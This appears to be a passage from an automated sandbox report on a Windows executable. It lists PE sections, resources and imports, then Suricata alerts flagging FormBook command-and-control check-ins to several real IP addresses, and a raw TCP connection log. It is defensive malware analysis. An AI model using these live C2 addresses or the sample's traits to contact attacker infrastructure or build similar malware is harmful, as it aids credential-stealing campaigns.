              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

              Sections

              NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
              .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
              .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
              .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

              Resources

              NameRVASizeTypeLanguageCountryZLIB Complexity
              RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
              RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
              RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
              RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
              RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
              RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
              RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
              RT_ICON0xad2600x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishGreat Britain0.8077617328519856
              RT_ICON0xadb080x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishGreat Britain0.5903179190751445
              RT_ICON0xae0700x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishGreat Britain0.5503112033195021
              RT_ICON0xb06180x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishGreat Britain0.6050656660412758
              RT_ICON0xb16c00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.7553191489361702
              RT_MENU0xb1b280x50dataEnglishGreat Britain0.9
              RT_DIALOG0xb1b780xfcdataEnglishGreat Britain0.6507936507936508
              RT_STRING0xb1c780x530dataEnglishGreat Britain0.33960843373493976
              RT_STRING0xb21a80x690dataEnglishGreat Britain0.26964285714285713
              RT_STRING0xb28380x4d0dataEnglishGreat Britain0.36363636363636365
              RT_STRING0xb2d080x5fcdataEnglishGreat Britain0.3087467362924282
              RT_STRING0xb33080x65cdataEnglishGreat Britain0.34336609336609336
              RT_STRING0xb39680x388dataEnglishGreat Britain0.377212389380531
              RT_STRING0xb3cf00x158Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0EnglishUnited States0.502906976744186
              RT_GROUP_ICON0xb3e480x84dataEnglishGreat Britain0.6439393939393939
              RT_GROUP_ICON0xb3ed00x14dataEnglishGreat Britain1.15
              RT_GROUP_ICON0xb3ee80x14dataEnglishGreat Britain1.25
              RT_GROUP_ICON0xb3f000x14dataEnglishGreat Britain1.25
              RT_VERSION0xb3f180x19cdataEnglishGreat Britain0.5339805825242718
              RT_MANIFEST0xb40b80x26cASCII text, with CRLF line terminatorsEnglishUnited States0.5145161290322581

              Imports

              DLLImport
              WSOCK32.dll__WSAFDIsSet, setsockopt, ntohs, recvfrom, sendto, htons, select, listen, WSAStartup, bind, closesocket, connect, socket, send, WSACleanup, ioctlsocket, accept, WSAGetLastError, inet_addr, gethostbyname, gethostname, recv
              VERSION.dllVerQueryValueW, GetFileVersionInfoW, GetFileVersionInfoSizeW
              WINMM.dlltimeGetTime, waveOutSetVolume, mciSendStringW
              COMCTL32.dllImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_ReplaceIcon, ImageList_Create, InitCommonControlsEx, ImageList_Destroy
              MPR.dllWNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W, WNetUseConnectionW
              WININET.dllInternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetConnectW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetQueryOptionW, InternetQueryDataAvailable
              PSAPI.DLLEnumProcesses, GetModuleBaseNameW, GetProcessMemoryInfo, EnumProcessModules
              USERENV.dllCreateEnvironmentBlock, DestroyEnvironmentBlock, UnloadUserProfile, LoadUserProfileW
              KERNEL32.dllHeapAlloc, Sleep, GetCurrentThreadId, RaiseException, MulDiv, GetVersionExW, GetSystemInfo, InterlockedIncrement, InterlockedDecrement, WideCharToMultiByte, lstrcpyW, MultiByteToWideChar, lstrlenW, lstrcmpiW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, DeleteFileW, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, GetProcessHeap, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetLocalTime, CompareStringW, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionAndSpinCount, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, GetTempPathW, GetTempFileNameW, VirtualFree, FormatMessageW, GetExitCodeProcess, SetErrorMode, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, DeviceIoControl, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetCurrentThread, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, LoadLibraryExW, HeapFree, WaitForSingleObject, CreateThread, DuplicateHandle, GetLastError, CloseHandle, GetCurrentProcess, GetProcAddress, LoadLibraryA, FreeLibrary, GetModuleFileNameW, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, GetCurrentDirectoryW, ExitProcess, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetTimeFormatW, GetDateFormatW, GetCommandLineW, GetStartupInfoW, IsProcessorFeaturePresent, HeapSize, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStringTypeW, HeapCreate, SetHandleCount, GetFileType, SetStdHandle, GetConsoleCP, GetConsoleMode, LCMapStringW, RtlUnwind, SetFilePointer, GetTimeZoneInformation, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetTickCount, HeapReAlloc, WriteConsoleW, SetEndOfFile, SetSystemPowerState, SetEnvironmentVariableA
              USER32.dllGetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, ReleaseCapture, SetCapture, WindowFromPoint, LoadImageW, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, CheckMenuRadioItem, SetWindowPos, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, SystemParametersInfoW, TranslateMessage, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetClassNameW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, GetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, MessageBoxW, DefWindowProcW, CopyImage, AdjustWindowRectEx, SetRect, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, GetMenuItemID, DispatchMessageW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, PeekMessageW, UnregisterHotKey, CharLowerBuffW, keybd_event, MonitorFromRect, GetWindowThreadProcessId
              GDI32.dllDeleteObject, AngleArc, GetTextExtentPoint32W, ExtCreatePen, StrokeAndFillPath, StrokePath, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, GetDeviceCaps, MoveToEx, DeleteDC, GetPixel, CreateDCW, Ellipse, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, SetTextColor, CreateFontW, GetTextFaceW, GetStockObject, LineTo
              COMDLG32.dllGetSaveFileNameW, GetOpenFileNameW
              ADVAPI32.dllRegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegCreateKeyExW, GetUserNameW, RegConnectRegistryW, CloseServiceHandle, UnlockServiceDatabase, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, InitializeSecurityDescriptor, InitializeAcl, GetLengthSid, CopySid, LogonUserW, LockServiceDatabase, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, GetAce, AddAce, SetSecurityDescriptorDacl, RegOpenKeyExW, RegQueryValueExW, AdjustTokenPrivileges, InitiateSystemShutdownExW, OpenSCManagerW, RegCloseKey
              SHELL32.dllDragQueryPoint, ShellExecuteExW, SHGetFolderPathW, DragQueryFileW, SHEmptyRecycleBinW, SHBrowseForFolderW, SHFileOperationW, SHGetPathFromIDListW, SHGetDesktopFolder, SHGetMalloc, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
              ole32.dllOleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CLSIDFromString, StringFromGUID2, CoInitialize, CoUninitialize, CoCreateInstance, CreateStreamOnHGlobal, CoTaskMemAlloc, CoTaskMemFree, ProgIDFromCLSID, OleInitialize, CreateBindCtx, CLSIDFromProgID, CoInitializeSecurity, CoCreateInstanceEx, CoSetProxyBlanket, OleUninitialize, IIDFromString
              OLEAUT32.dllVariantChangeType, VariantCopyInd, DispCallFunc, CreateStdDispatch, CreateDispTypeInfo, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SysStringLen, SafeArrayAllocData, GetActiveObject, QueryPathOfRegTypeLib, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, SysAllocString, VariantCopy, VariantClear, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, OleLoadPicture, SafeArrayAccessData, VariantInit

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishGreat Britain
              EnglishUnited States

              Network Behavior

              Suricata IDS Alerts

              TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
              2024-09-22T17:35:18.761396+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749709148.72.152.17480TCP
              2024-09-22T17:35:18.761396+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749709148.72.152.17480TCP
              2024-09-22T17:35:34.564690+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7497113.33.130.19080TCP
              2024-09-22T17:35:37.085303+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7497123.33.130.19080TCP
              2024-09-22T17:35:39.575322+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.7497133.33.130.19080TCP
              2024-09-22T17:35:42.174257+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.7497143.33.130.19080TCP
              2024-09-22T17:35:42.174257+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.7497143.33.130.19080TCP
              2024-09-22T17:35:48.517116+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749715172.191.244.6280TCP
              2024-09-22T17:35:50.996842+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749716172.191.244.6280TCP
              2024-09-22T17:35:53.575926+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749717172.191.244.6280TCP
              2024-09-22T17:35:56.120065+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749718172.191.244.6280TCP
              2024-09-22T17:35:56.120065+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749718172.191.244.6280TCP
              2024-09-22T17:36:02.435973+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749719172.96.191.3980TCP
              2024-09-22T17:36:04.991771+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749720172.96.191.3980TCP
              2024-09-22T17:36:07.507518+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749721172.96.191.3980TCP
              2024-09-22T17:36:10.054859+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749722172.96.191.3980TCP
              2024-09-22T17:36:10.054859+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749722172.96.191.3980TCP
              2024-09-22T17:36:15.772021+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749723217.70.184.5080TCP
              2024-09-22T17:36:18.306948+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749724217.70.184.5080TCP
              2024-09-22T17:36:20.860552+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.749725217.70.184.5080TCP
              2024-09-22T17:36:23.407666+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.749726217.70.184.5080TCP
              2024-09-22T17:36:23.407666+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.749726217.70.184.5080TCP
              2024-09-22T17:36:29.259482+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74972763.250.47.4080TCP
              2024-09-22T17:36:31.833562+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74972863.250.47.4080TCP
              2024-09-22T17:36:34.393042+02002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.74972963.250.47.4080TCP
              2024-09-22T17:36:37.347253+02002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.74973063.250.47.4080TCP
              2024-09-22T17:36:37.347253+02002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.74973063.250.47.4080TCP

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Sep 22, 2024 17:35:18.191565037 CEST4970980192.168.2.7148.72.152.174
              Sep 22, 2024 17:35:18.203094959 CEST8049709148.72.152.174192.168.2.7
              Sep 22, 2024 17:35:18.203324080 CEST4970980192.168.2.7148.72.152.174
              Sep 22, 2024 17:35:18.210988045 CEST4970980192.168.2.7148.72.152.174
              Sep 22, 2024 17:35:18.220236063 CEST8049709148.72.152.174192.168.2.7
              Sep 22, 2024 17:35:18.760966063 CEST8049709148.72.152.174192.168.2.7
              Sep 22, 2024 17:35:18.761321068 CEST8049709148.72.152.174192.168.2.7
              Sep 22, 2024 17:35:18.761395931 CEST4970980192.168.2.7148.72.152.174
              Sep 22, 2024 17:35:18.764204979 CEST4970980192.168.2.7148.72.152.174
              Sep 22, 2024 17:35:18.776746035 CEST8049709148.72.152.174192.168.2.7
              Sep 22, 2024 17:35:33.933415890 CEST4971180192.168.2.73.33.130.190
              Sep 22, 2024 17:35:33.959399939 CEST80497113.33.130.190192.168.2.7
              Sep 22, 2024 17:35:33.959505081 CEST4971180192.168.2.73.33.130.190
              Sep 22, 2024 17:35:33.969995022 CEST4971180192.168.2.73.33.130.190
              Sep 22, 2024 17:35:33.980489969 CEST80497113.33.130.190192.168.2.7
              Sep 22, 2024 17:35:34.564611912 CEST80497113.33.130.190192.168.2.7
              Sep 22, 2024 17:35:34.564690113 CEST4971180192.168.2.73.33.130.190
              Sep 22, 2024 17:35:35.486634970 CEST4971180192.168.2.73.33.130.190
              Sep 22, 2024 17:35:35.491465092 CEST80497113.33.130.190192.168.2.7
              Sep 22, 2024 17:35:36.505280018 CEST4971280192.168.2.73.33.130.190
              Sep 22, 2024 17:35:36.540115118 CEST80497123.33.130.190192.168.2.7
              Sep 22, 2024 17:35:36.540219069 CEST4971280192.168.2.73.33.130.190
              Sep 22, 2024 17:35:36.550641060 CEST4971280192.168.2.73.33.130.190
              Sep 22, 2024 17:35:36.592384100 CEST80497123.33.130.190192.168.2.7
              Sep 22, 2024 17:35:37.085072041 CEST80497123.33.130.190192.168.2.7
              Sep 22, 2024 17:35:37.085303068 CEST4971280192.168.2.73.33.130.190
              Sep 22, 2024 17:35:38.064832926 CEST4971280192.168.2.73.33.130.190
              Sep 22, 2024 17:35:38.071794033 CEST80497123.33.130.190192.168.2.7
              Sep 22, 2024 17:35:39.084495068 CEST4971380192.168.2.73.33.130.190
              Sep 22, 2024 17:35:39.089982986 CEST80497133.33.130.190192.168.2.7
              Sep 22, 2024 17:35:39.090101004 CEST4971380192.168.2.73.33.130.190
              Sep 22, 2024 17:35:39.100012064 CEST4971380192.168.2.73.33.130.190
              Sep 22, 2024 17:35:39.105034113 CEST80497133.33.130.190192.168.2.7
              Sep 22, 2024 17:35:39.105130911 CEST80497133.33.130.190192.168.2.7
              Sep 22, 2024 17:35:39.575215101 CEST80497133.33.130.190192.168.2.7
              Sep 22, 2024 17:35:39.575321913 CEST4971380192.168.2.73.33.130.190
              Sep 22, 2024 17:35:40.612255096 CEST4971380192.168.2.73.33.130.190
              Sep 22, 2024 17:35:40.624033928 CEST80497133.33.130.190192.168.2.7
              Sep 22, 2024 17:35:41.637425900 CEST4971480192.168.2.73.33.130.190
              Sep 22, 2024 17:35:41.658334970 CEST80497143.33.130.190192.168.2.7
              Sep 22, 2024 17:35:41.658513069 CEST4971480192.168.2.73.33.130.190
              Sep 22, 2024 17:35:41.671920061 CEST4971480192.168.2.73.33.130.190
              Sep 22, 2024 17:35:41.680931091 CEST80497143.33.130.190192.168.2.7
              Sep 22, 2024 17:35:42.173580885 CEST80497143.33.130.190192.168.2.7
              Sep 22, 2024 17:35:42.174184084 CEST80497143.33.130.190192.168.2.7
              Sep 22, 2024 17:35:42.174257040 CEST4971480192.168.2.73.33.130.190
              Sep 22, 2024 17:35:42.176409960 CEST4971480192.168.2.73.33.130.190
              Sep 22, 2024 17:35:42.183032036 CEST80497143.33.130.190192.168.2.7
              Sep 22, 2024 17:35:47.962259054 CEST4971580192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:47.976387024 CEST8049715172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:47.976526976 CEST4971580192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:47.991040945 CEST4971580192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:48.006547928 CEST8049715172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:48.515252113 CEST8049715172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:48.516979933 CEST8049715172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:48.517116070 CEST4971580192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:49.502362967 CEST4971580192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:50.528055906 CEST4971680192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:50.533968925 CEST8049716172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:50.534065962 CEST4971680192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:50.544984102 CEST4971680192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:50.554039001 CEST8049716172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:50.996587992 CEST8049716172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:50.996772051 CEST8049716172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:50.996841908 CEST4971680192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:52.049200058 CEST4971680192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:53.069988012 CEST4971780192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:53.074966908 CEST8049717172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:53.075179100 CEST4971780192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:53.095289946 CEST4971780192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:53.100353956 CEST8049717172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:53.100692034 CEST8049717172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:53.574250937 CEST8049717172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:53.575823069 CEST8049717172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:53.575926065 CEST4971780192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:54.611643076 CEST4971780192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:55.630073071 CEST4971880192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:55.635283947 CEST8049718172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:55.635375977 CEST4971880192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:55.642049074 CEST4971880192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:55.648128986 CEST8049718172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:56.119117975 CEST8049718172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:56.120002985 CEST8049718172.191.244.62192.168.2.7
              Sep 22, 2024 17:35:56.120064974 CEST4971880192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:56.121926069 CEST4971880192.168.2.7172.191.244.62
              Sep 22, 2024 17:35:56.129473925 CEST8049718172.191.244.62192.168.2.7
              Sep 22, 2024 17:36:01.510426044 CEST4971980192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:01.515836954 CEST8049719172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:01.515954971 CEST4971980192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:01.526561975 CEST4971980192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:01.531619072 CEST8049719172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:02.435503006 CEST8049719172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:02.435914993 CEST8049719172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:02.435972929 CEST4971980192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:03.033567905 CEST4971980192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:04.053086996 CEST4972080192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:04.057964087 CEST8049720172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:04.058044910 CEST4972080192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:04.071688890 CEST4972080192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:04.076551914 CEST8049720172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:04.981163025 CEST8049720172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:04.989682913 CEST8049720172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:04.991770983 CEST4972080192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:05.580457926 CEST4972080192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:06.599453926 CEST4972180192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:06.604367018 CEST8049721172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:06.604439974 CEST4972180192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:06.617681980 CEST4972180192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:06.622545004 CEST8049721172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:06.622685909 CEST8049721172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:07.506680965 CEST8049721172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:07.506787062 CEST8049721172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:07.507518053 CEST4972180192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:08.127367973 CEST4972180192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:09.145860910 CEST4972280192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:09.151113987 CEST8049722172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:09.153465033 CEST4972280192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:09.160659075 CEST4972280192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:09.165884972 CEST8049722172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:10.054687023 CEST8049722172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:10.054722071 CEST8049722172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:10.054858923 CEST4972280192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:10.057935953 CEST4972280192.168.2.7172.96.191.39
              Sep 22, 2024 17:36:10.063117981 CEST8049722172.96.191.39192.168.2.7
              Sep 22, 2024 17:36:15.135401011 CEST4972380192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:15.141243935 CEST8049723217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:15.141737938 CEST4972380192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:15.159785032 CEST4972380192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:15.165047884 CEST8049723217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:15.771171093 CEST8049723217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:15.771301031 CEST8049723217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:15.772021055 CEST4972380192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:16.674195051 CEST4972380192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:17.692848921 CEST4972480192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:17.697742939 CEST8049724217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:17.697844982 CEST4972480192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:17.711430073 CEST4972480192.168.2.7217.70.184.50
              Sep 22, 2024 17:36:17.716198921 CEST8049724217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:18.306798935 CEST8049724217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:18.306896925 CEST8049724217.70.184.50192.168.2.7
              Sep 22, 2024 17:36:18.306947947 CEST4972480192.168.2.7217.70.184.50
